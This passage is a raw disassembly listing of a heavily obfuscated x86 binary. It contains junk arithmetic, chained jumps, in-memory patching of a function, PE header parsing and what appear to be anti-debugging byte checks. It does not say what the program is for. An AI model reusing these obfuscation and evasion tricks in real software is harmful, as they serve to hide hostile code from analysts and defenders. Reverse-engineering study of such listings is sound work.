		jmp	sub_44E5E5
; END OF FUNCTION CHUNK	FOR sub_4554E9
; ---------------------------------------------------------------------------
		and	eax, 2A048F24h
		jmp	sub_43E2D2

; =============== S U B	R O U T	I N E =======================================



sub_45609B	proc near		; CODE XREF: sub_443EAB+6p
					; y2kk37jd:00444663j

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]
		pop	edi
		xchg	edx, [esp-4+arg_0]
		lea	eax, sub_458161
		push	offset loc_449E44
		jmp	nullsub_176
sub_45609B	endp

; ---------------------------------------------------------------------------
		sbb	edx, 3959252Dh
		jmp	sub_44E9BA
; ---------------------------------------------------------------------------

loc_4560BD:				; DATA XREF: sub_43F5BD+F3B2o
		push	edx
		call	sub_4487FD
		push	0AF1A89D6h
		pop	eax
		jmp	loc_45A5D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448159

loc_4560CE:				; CODE XREF: sub_448159:loc_440841j
		call	sub_43DA7F
; END OF FUNCTION CHUNK	FOR sub_448159
; START	OF FUNCTION CHUNK FOR sub_43BFAE

loc_4560D3:				; CODE XREF: sub_43BFAE+1AD61j
		jmp	loc_4491D2
; END OF FUNCTION CHUNK	FOR sub_43BFAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E9

loc_4560D8:				; CODE XREF: sub_4554E9-FAC2j
		jmp	loc_43E0B0
; END OF FUNCTION CHUNK	FOR sub_4554E9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_4560DD:				; CODE XREF: sub_44001E+1400j
		jmp	loc_44B90F
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_4560E2:				; CODE XREF: sub_43C851+7D06j
		call	sub_4554E9
; END OF FUNCTION CHUNK	FOR sub_43C851
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4560E7:				; CODE XREF: sub_445226+CDF7j
		jmp	loc_45C174
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4486E1

loc_4560EC:				; CODE XREF: sub_4486E1-275Cj
		jmp	sub_44635E
; END OF FUNCTION CHUNK	FOR sub_4486E1
; ---------------------------------------------------------------------------

loc_4560F1:				; CODE XREF: y2kk37jd:00455D28j
		jz	loc_44F53D
		jmp	loc_458F40
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C4BC

loc_4560FC:				; CODE XREF: sub_44C4BC+1DA9j
		jno	loc_440284

loc_456102:				; CODE XREF: sub_44C4BC:loc_44F76Dj
		push	0CE2EBE6h
		pop	eax
		or	eax, 0CD250DB0h
		sub	eax, 0FD89F89Ah
		test	eax, 80h
		jmp	loc_44D834
; END OF FUNCTION CHUNK	FOR sub_44C4BC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4562E5

loc_45611F:				; CODE XREF: sub_4562E5:loc_4562EDj
		and	esi, 927C4A59h
		add	esi, 0A3AAF6FAh
		cmp	esi, 0CC30E902h
		jmp	loc_44E9ED
; END OF FUNCTION CHUNK	FOR sub_4562E5

; =============== S U B	R O U T	I N E =======================================



sub_456136	proc near		; CODE XREF: sub_449DFE-43EDp
					; y2kk37jd:0044B646j

; FUNCTION CHUNK AT 0043B322 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444ED2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044572A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453272 SIZE 00000017 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	[ebp-10h], eax
		cmp	dword ptr [ebp-4], 0
		jz	loc_43CC4C
		jmp	loc_43B322
sub_456136	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45614C:				; CODE XREF: y2kk37jd:0044051Cj
		cmp	ebx, 8158CACEh
		jmp	loc_44CD42
; ---------------------------------------------------------------------------

loc_456157:				; CODE XREF: y2kk37jd:004402F6j
		add	edx, ebp
		push	offset sub_4504FB
		jmp	locret_44DA4F
; ---------------------------------------------------------------------------

loc_456163:				; DATA XREF: sub_43D3EB+1C636o
		xor	ecx, 6FE6A8B0h
		add	ecx, ebp

loc_45616B:				; CODE XREF: y2kk37jd:loc_452426j
		add	ecx, 41EEBE89h
		push	offset sub_453153
		jmp	locret_452334
; ---------------------------------------------------------------------------

loc_45617B:				; CODE XREF: y2kk37jd:00448469j
		jz	loc_455AC4
		jmp	loc_44F4FC
; ---------------------------------------------------------------------------

loc_456186:				; CODE XREF: y2kk37jd:0043D4AAj
		adc	edx, 0EDBD82A3h

; =============== S U B	R O U T	I N E =======================================



sub_45618C	proc near		; CODE XREF: y2kk37jd:004512FAp

; FUNCTION CHUNK AT 00457DF3 SIZE 00000008 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		call	sub_442C3E
		mov	ds:dword_41E05C, eax
		lea	eax, nullsub_442
		jmp	loc_457DF3
sub_45618C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444463

loc_4561A6:				; CODE XREF: sub_444463:loc_451575j
		add	eax, 0BE2A9C17h
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_448350
		jmp	loc_44F7A6
; END OF FUNCTION CHUNK	FOR sub_444463
; ---------------------------------------------------------------------------
		and	edx, 0EC268FA8h
		jmp	loc_43D1BA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4439EE

loc_4561C7:				; CODE XREF: sub_4439EE:loc_445C26j
		call	sub_45ADEC
		mov	eax, 26F528F2h
		call	sub_44DE4C
; END OF FUNCTION CHUNK	FOR sub_4439EE
; START	OF FUNCTION CHUNK FOR sub_445EBA

loc_4561D6:				; CODE XREF: sub_445EBA+Fj
		jmp	locret_45B800
; END OF FUNCTION CHUNK	FOR sub_445EBA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459672

loc_4561DB:				; CODE XREF: sub_459672-15432j
		jmp	sub_44E5E5
; END OF FUNCTION CHUNK	FOR sub_459672
; ---------------------------------------------------------------------------

loc_4561E0:				; CODE XREF: y2kk37jd:0043EC2Ej
		jmp	loc_4427A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_4561E5:				; CODE XREF: sub_43ED86-3347j
		jmp	loc_448A98
; END OF FUNCTION CHUNK	FOR sub_43ED86
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44438E

loc_4561EA:				; CODE XREF: sub_44438E+1510Aj
		push	offset loc_4581B9
		jmp	nullsub_278
; END OF FUNCTION CHUNK	FOR sub_44438E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_4561F4:				; CODE XREF: sub_43F346+14j
		jz	loc_459248
		jmp	loc_449E52
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F641

loc_4561FF:				; CODE XREF: sub_44F641+8252j
		jo	loc_4478C6
		jns	loc_44788D

loc_45620B:				; CODE XREF: sub_44F641:loc_4512FFj
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jmp	loc_458B0C
; END OF FUNCTION CHUNK	FOR sub_44F641
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4502C2

loc_456216:				; CODE XREF: sub_4502C2:loc_4523EAj
		call	sub_45405E
		mov	edx, 0B9726E5Ah
		call	sub_440CD1
		push	eax
		ror	eax, 1Ah
		mov	ds:dword_4470D0, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_4502C2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D5A

loc_456230:				; CODE XREF: sub_457D5A:loc_4451A0j
					; sub_4447EA+1682Aj
		jmp	loc_452A9A
; END OF FUNCTION CHUNK	FOR sub_457D5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED7E

loc_456235:				; CODE XREF: sub_43ED7E+3j
					; y2kk37jd:loc_44003Aj
		jmp	nullsub_433
; END OF FUNCTION CHUNK	FOR sub_43ED7E

; =============== S U B	R O U T	I N E =======================================



sub_45623A	proc near		; CODE XREF: sub_4502C2j

; FUNCTION CHUNK AT 00455EAE SIZE 00000010 BYTES

		push	ebp
		jmp	loc_455EAE
sub_45623A	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_524. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_456241:				; CODE XREF: y2kk37jd:00441355j
		jmp	loc_44B4B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_456246:				; CODE XREF: sub_4514DE-11692j
		jmp	loc_4563DB
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442829

loc_45624B:				; CODE XREF: sub_442829-2038j
		jnz	loc_43CC65
		jmp	loc_43E255
; END OF FUNCTION CHUNK	FOR sub_442829
; ---------------------------------------------------------------------------

locret_456256:				; CODE XREF: y2kk37jd:loc_45822Bj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B405

loc_456257:				; CODE XREF: sub_44B405+5j
		jmp	loc_458664
; END OF FUNCTION CHUNK	FOR sub_44B405
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_45625C:				; CODE XREF: sub_449C4F-11AAj
		jmp	loc_44A5D3
; END OF FUNCTION CHUNK	FOR sub_449C4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_456261:				; CODE XREF: sub_45689F-12E40j
		jmp	loc_43F4F3
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446183

loc_456266:				; CODE XREF: sub_446183+8A15j
		add	edi, 0AB2B945h
		xchg	edi, [esp+8+var_8]
		jmp	sub_44C500
; END OF FUNCTION CHUNK	FOR sub_446183
; ---------------------------------------------------------------------------
		cmp	ebp, eax
		jmp	loc_44003A
; ---------------------------------------------------------------------------

loc_45627B:				; CODE XREF: y2kk37jd:0044EFA6j
					; y2kk37jd:loc_459B6Fj
		rol	edi, 1Bh

loc_45627E:				; CODE XREF: y2kk37jd:loc_43EECCj
		xor	edi, 0F62831C7h
		add	edi, 0D4F5058Fh
		add	edi, ebp
		add	edi, 5F7627E2h
		jmp	loc_45297A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AAA1

loc_456297:				; CODE XREF: sub_44AAA1:loc_447CB1j
		jnz	loc_44D95B

loc_45629D:				; CODE XREF: sub_452C0C+1972j
		jmp	loc_45BC1C
; END OF FUNCTION CHUNK	FOR sub_44AAA1
; ---------------------------------------------------------------------------

loc_4562A2:				; CODE XREF: y2kk37jd:00447654j
		jmp	loc_458383
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C1D5

loc_4562A7:				; CODE XREF: sub_43C1D5+Aj
		jmp	loc_450A7D
; END OF FUNCTION CHUNK	FOR sub_43C1D5
; ---------------------------------------------------------------------------
		pop	edx
		jmp	loc_44D956
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F3F5

loc_4562B2:				; CODE XREF: sub_44F3F5-4D75j
		cmp	edi, 0B3F3EABEh
		jmp	loc_441BF8
; END OF FUNCTION CHUNK	FOR sub_44F3F5

; =============== S U B	R O U T	I N E =======================================



sub_4562BD	proc near		; CODE XREF: y2kk37jd:0043FFADj
					; y2kk37jd:0044F372p

; FUNCTION CHUNK AT 0044F4B8 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	edx
		pushf
		push	0CCC647Ah
		pop	edx
		add	edx, 0D80542F4h
		xor	edx, 38B08223h
		jmp	loc_44F4B8
sub_4562BD	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408B9

loc_4562DA:				; CODE XREF: sub_4408B9+180B7j
		jz	loc_43C4DC
		jmp	loc_442789
; END OF FUNCTION CHUNK	FOR sub_4408B9

; =============== S U B	R O U T	I N E =======================================



sub_4562E5	proc near		; DATA XREF: sub_43D0C9+1CAD1o

var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043D99A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043FC28 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442CF1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004470F1 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00448429 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044E86A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044E9ED SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FA1C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455BEF SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045611F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045760F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458515 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458C89 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004591D1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A8B8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AE78 SIZE 00000018 BYTES

		push	ebx
		mov	ebx, edx
		call	sub_442ED1

loc_4562ED:				; CODE XREF: y2kk37jd:0043FB75j
		jmp	loc_45611F
sub_4562E5	endp


; =============== S U B	R O U T	I N E =======================================



sub_4562F2	proc near		; CODE XREF: sub_445226:loc_445680j
		push	ebp
		sbb	edx, ecx
sub_4562F2	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_448700

loc_4562F5:				; CODE XREF: sub_448700:loc_44CD32j
		jmp	loc_44878C
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------
		test	esi, eax
		jmp	loc_450D28
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B55D

loc_456301:				; CODE XREF: sub_44B55D+Cj
		add	edx, 20D72EE7h
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_43F5AB

loc_456313:				; CODE XREF: y2kk37jd:loc_44468Dj
		jmp	loc_45A3D2
; END OF FUNCTION CHUNK	FOR sub_44B55D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CBDE

loc_456318:				; CODE XREF: sub_43CBDE:loc_455CD5j
		push	eax
		call	sub_43BA66
		mov	ds:dword_446628, eax
		cmp	ds:dword_446628, 0
; END OF FUNCTION CHUNK	FOR sub_43CBDE
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45632A:				; CODE XREF: sub_445226:loc_44550Dj
		jnz	loc_455CA5
		jmp	loc_457EFD
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

locret_456335:				; CODE XREF: y2kk37jd:00455BA1j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458273

loc_456336:				; CODE XREF: sub_458273+Fj
		jmp	loc_453F1D
; END OF FUNCTION CHUNK	FOR sub_458273
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_45633B:				; CODE XREF: sub_445787-5E21j
		jmp	loc_449E96
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_456340:				; CODE XREF: sub_445226+FD6Ej
		jge	loc_4594DE

loc_456346:				; CODE XREF: sub_445226:loc_4416EEj
		or	eax, 0F4D4A345h
		and	eax, 97769695h
		xor	eax, 0E16D43CFh
		add	eax, 0F6367472h
		jmp	loc_4585CF
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440337

loc_456363:				; CODE XREF: y2kk37jd:loc_44BA2Dj
					; sub_440337:loc_4555E0j
		push	edx
		call	sub_4502E6

loc_456369:				; CODE XREF: y2kk37jd:00446F2Ej
		jmp	loc_43D5E6
; END OF FUNCTION CHUNK	FOR sub_440337
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454539

loc_45636E:				; CODE XREF: sub_454539-16947j
		jmp	nullsub_313
; END OF FUNCTION CHUNK	FOR sub_454539
; ---------------------------------------------------------------------------

loc_456373:				; CODE XREF: y2kk37jd:loc_4404C7j
		pop	esi
		rol	esi, 3
		and	esi, 5ADB4BD4h
		add	esi, 0A7E9D820h
		jmp	loc_451BFA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_456388:				; CODE XREF: sub_449C4F:loc_45BFA0j
		push	0B31FDC3Fh
		pop	edx
		rol	edx, 1Dh
		test	edx, 200h
		jmp	loc_447D19
; END OF FUNCTION CHUNK	FOR sub_449C4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C2AE

loc_45639C:				; CODE XREF: sub_44C2AE:loc_444F0Dj
		xchg	esi, [esp+0]
		push	eax
		lea	eax, sub_45A05D
		push	eax
		call	sub_4548FB

loc_4563AC:				; CODE XREF: sub_44FC52+1j
		push	ebp
		pop	edi
		xchg	edi, [esp+8+var_8]
		call	sub_44CDD5

loc_4563B6:				; CODE XREF: y2kk37jd:004545DDj
		jns	loc_4529E2
		xchg	esi, edi
		jmp	sub_459789
; END OF FUNCTION CHUNK	FOR sub_44C2AE
; ---------------------------------------------------------------------------

loc_4563C3:				; CODE XREF: y2kk37jd:00457C5Fj
		sub	edx, eax
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_4563C5:				; CODE XREF: sub_44AC89:loc_457C48j
		sub	edx, 864728ECh
		add	edx, 55F34BA0h
		call	sub_44AF36

loc_4563D6:				; CODE XREF: y2kk37jd:0043FA0Bj
		jmp	loc_4442F5
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_4563DB:				; CODE XREF: sub_4514DE:loc_456246j
		js	loc_44034A
		mov	eax, [esp+8+var_8]
		push	edx
		call	sub_44E0F1

loc_4563EA:				; CODE XREF: sub_455531-1463Ej
		jmp	loc_4461DC
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------
		xor	ecx, 0A2961624h
		jmp	sub_446303
; ---------------------------------------------------------------------------

loc_4563FA:				; CODE XREF: y2kk37jd:00442B21j
		jz	loc_45ACE3
		jmp	loc_445A4C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458A74

loc_456405:				; CODE XREF: sub_458A74-FCCDj
		cmp	edi, 0B8BA356Eh
		jmp	loc_43D52A
; END OF FUNCTION CHUNK	FOR sub_458A74

; =============== S U B	R O U T	I N E =======================================



sub_456410	proc near		; DATA XREF: y2kk37jd:0043E49Ao

; FUNCTION CHUNK AT 004431B9 SIZE 00000005 BYTES

		lea	eax, [ebp-0Ch]
		jmp	loc_4431B9
sub_456410	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449129

loc_456418:				; CODE XREF: sub_449129:loc_449133j
		lea	eax, [ebp-20h]
		mov	dword ptr [eax], 70736957h
		lea	eax, [ebp-1Ch]
		mov	dword ptr [eax], 646E6957h
		lea	eax, [ebp-18h]
		mov	dword ptr [eax], 6C43776Fh
		lea	eax, [ebp-14h]
		jmp	loc_44AF1E
; END OF FUNCTION CHUNK	FOR sub_449129
; ---------------------------------------------------------------------------

loc_45643B:				; CODE XREF: y2kk37jd:0043E774j
		xchg	edi, ebp

; =============== S U B	R O U T	I N E =======================================



sub_45643D	proc near		; CODE XREF: y2kk37jd:loc_44A6D4p

; FUNCTION CHUNK AT 004545B1 SIZE 0000000F BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	[ebx], eax
		jmp	loc_4545B1
sub_45643D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_456448:				; DATA XREF: sub_4497E8-53C0o
		add	edi, 61C0629h
		xchg	edi, [esp]
		jmp	loc_4437E8
; ---------------------------------------------------------------------------
		and	ecx, 8744FD8Fh
		jmp	sub_44355A
; ---------------------------------------------------------------------------

loc_456461:				; CODE XREF: y2kk37jd:00443721j
		adc	eax, 0CB3DE1D2h
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_456467:				; CODE XREF: sub_4411C3:loc_440C04j
					; sub_4448E2:loc_44B27Ej
		sub	esi, 13E9C41Fh
		test	esi, 4000h
		jmp	loc_43FD2E
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B489

loc_456478:				; CODE XREF: sub_44B489:loc_43DE65j
		jnz	loc_4544C1
		jmp	loc_43FD4F
; END OF FUNCTION CHUNK	FOR sub_44B489
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44704D

loc_456483:				; CODE XREF: sub_44704D-BE7Cj
		call	nullsub_11

loc_456488:				; CODE XREF: sub_451C21:loc_451018j
					; sub_4585B4+Bj
		js	loc_44AC3E
		xor	eax, eax
		mov	[ebp-0Ch], eax
		jmp	loc_454237
; END OF FUNCTION CHUNK	FOR sub_44704D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_456498:				; CODE XREF: sub_445226:loc_44E7E0j
					; sub_445226+95C7j
		xor	edx, 0B6635644h
		call	sub_4413E3

loc_4564A3:				; CODE XREF: y2kk37jd:0044E1B0j
		jmp	loc_44B013
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D627

loc_4564A8:				; CODE XREF: sub_44D627-1B34j
		jmp	loc_45BD47
; END OF FUNCTION CHUNK	FOR sub_44D627
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A961

loc_4564AD:				; CODE XREF: sub_45A961-1582Dj
		popf
		jmp	loc_4443AB
; END OF FUNCTION CHUNK	FOR sub_45A961
; ---------------------------------------------------------------------------

loc_4564B3:				; CODE XREF: y2kk37jd:004484D2j
		jz	loc_43B2CE
; START	OF FUNCTION CHUNK FOR sub_44EE3D

loc_4564B9:				; CODE XREF: sub_44EE3D+Aj
		jmp	loc_43E222
; END OF FUNCTION CHUNK	FOR sub_44EE3D
; ---------------------------------------------------------------------------

loc_4564BE:				; CODE XREF: y2kk37jd:004431D8j
		jmp	loc_447596
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C03C

loc_4564C3:				; CODE XREF: sub_45C03C-1BAD6j
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_45C03C
; ---------------------------------------------------------------------------
		test	ecx, ebp
		jmp	loc_455314
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_4564CF:				; CODE XREF: sub_43ED19+4F9Bj
		jz	loc_45336C
		add	ebx, 0F20F8000h

loc_4564DB:				; CODE XREF: sub_43ED19:loc_443CA8j
		xor	ebx, 8B393ACCh
		add	eax, ebx
		xchg	ecx, [esp+4+var_4]
		jmp	loc_45519C
; END OF FUNCTION CHUNK	FOR sub_43ED19

; =============== S U B	R O U T	I N E =======================================



sub_4564EB	proc near		; DATA XREF: sub_454E20-183Ao

; FUNCTION CHUNK AT 0043BA61 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C40A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FB55 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00445079 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A50D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004519FB SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045300E SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00458921 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0045B03E SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045C088 SIZE 00000005 BYTES

		cmp	eax, 0C3C033h
		jnz	loc_458921
		jmp	loc_45C088
sub_4564EB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4564FB:				; CODE XREF: y2kk37jd:00456C3Aj
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-4], 4
		jnz	loc_456511
		add	dword ptr [ebp-8], 4
		jmp	loc_456C43
; ---------------------------------------------------------------------------

loc_456511:				; CODE XREF: y2kk37jd:00456502j
		add	dword ptr [ebp-8], 2
		jmp	loc_456C43

; =============== S U B	R O U T	I N E =======================================



sub_45651A	proc near		; CODE XREF: sub_44D302:loc_45083Fp
					; sub_45430C+4p

; FUNCTION CHUNK AT 004524A5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AA2C SIZE 00000005 BYTES

		push	ebp
		jmp	loc_4524A5
sub_45651A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447EA

loc_456520:				; CODE XREF: sub_4447EA-5AFCj
		add	eax, 3C437Fh
		jmp	loc_457EED
; END OF FUNCTION CHUNK	FOR sub_4447EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45652B:				; CODE XREF: sub_445226:loc_45208Aj
		pop	edx
		or	edx, 0AD644177h
		add	edx, 0C691C9h
		xchg	edx, [esp+8+var_8]
		jmp	loc_444031
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		retn

; =============== S U B	R O U T	I N E =======================================



sub_456541	proc near		; CODE XREF: sub_44EB56-D8B1p
					; sub_445226:loc_444031j ...

; FUNCTION CHUNK AT 00457EB1 SIZE 00000005 BYTES

		jb	sub_443278
		call	sub_43CB44

loc_45654C:				; CODE XREF: y2kk37jd:0044DE1Cj
					; sub_43E679:loc_458532j
		mov	edi, [edx]

loc_45654E:				; CODE XREF: y2kk37jd:loc_443CDFj
		xor	esi, 0FE02DEDBh
		add	esi, 81438Dh
		xchg	esi, [esp+0]
		jmp	loc_457EB1
sub_456541	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_98. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441222

loc_456563:				; CODE XREF: sub_441222+3A3Cj
		jmp	nullsub_503
; END OF FUNCTION CHUNK	FOR sub_441222
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_456568:				; CODE XREF: sub_43BD0D+E86Bj
		lea	eax, sub_43BD0D
		mov	byte ptr [eax],	0C3h
		jmp	sub_43BD0D
; ---------------------------------------------------------------------------

loc_456576:				; CODE XREF: sub_43BD0D+1j
		call	sub_45A40E

loc_45657B:				; CODE XREF: sub_43D41D+D80Fj
		jmp	loc_44ED72
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_456580:				; CODE XREF: sub_44AC89-698Ej
		and	eax, ebp
		ror	edx, 1Ah
		jmp	loc_4401D0
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451964

loc_45658A:				; CODE XREF: sub_451964:loc_44E813j
					; sub_451964-313Fj
		sub	edx, 0CE9FFAB4h
		rol	edx, 13h
		xor	edx, 0AF9C5AFBh
		add	ecx, edx
		jmp	loc_44175F
; END OF FUNCTION CHUNK	FOR sub_451964
; ---------------------------------------------------------------------------
		cmp	ebx, 969A96EDh
		jmp	loc_4454AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448797

loc_4565AB:				; CODE XREF: sub_448797+6EE9j
		add	ecx, eax
		jns	loc_44B21D
; END OF FUNCTION CHUNK	FOR sub_448797
; START	OF FUNCTION CHUNK FOR sub_445B38

loc_4565B3:				; CODE XREF: sub_445B38-815Cj
					; sub_445656+4j ...
		jmp	loc_45C533
; ---------------------------------------------------------------------------

loc_4565B8:				; CODE XREF: sub_448797+Aj
					; sub_445B38:loc_44E5AEj
		pop	ecx
		xchg	edi, [esp-8+arg_4]
		jmp	loc_4487EF
; END OF FUNCTION CHUNK	FOR sub_445B38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441DD4

loc_4565C1:				; CODE XREF: sub_441DD4+7j
		xchg	esi, [esp+0]
		call	sub_44F3F5
		push	4D687D42h
		pop	eax

loc_4565CF:				; CODE XREF: y2kk37jd:004447B0j
		jmp	loc_4592A2
; END OF FUNCTION CHUNK	FOR sub_441DD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D412

loc_4565D4:				; CODE XREF: sub_43D412:loc_45C634j
		jl	loc_44E3F7
		xor	eax, esi
		jmp	loc_44E3EC
; END OF FUNCTION CHUNK	FOR sub_43D412
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4565E1:				; CODE XREF: sub_445226+5A3Dj
		cmp	al, 0A4h
		jz	loc_4440CC
		jmp	loc_455953
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454413

loc_4565EE:				; CODE XREF: sub_454413:loc_44B779j
		movzx	eax, word ptr [eax+6]
		mov	[ebp-10h], eax
		mov	eax, [ebp-4]
		movzx	eax, word ptr [eax+14h]

loc_4565FC:				; CODE XREF: y2kk37jd:loc_43FCCEj
		add	eax, [ebp-4]
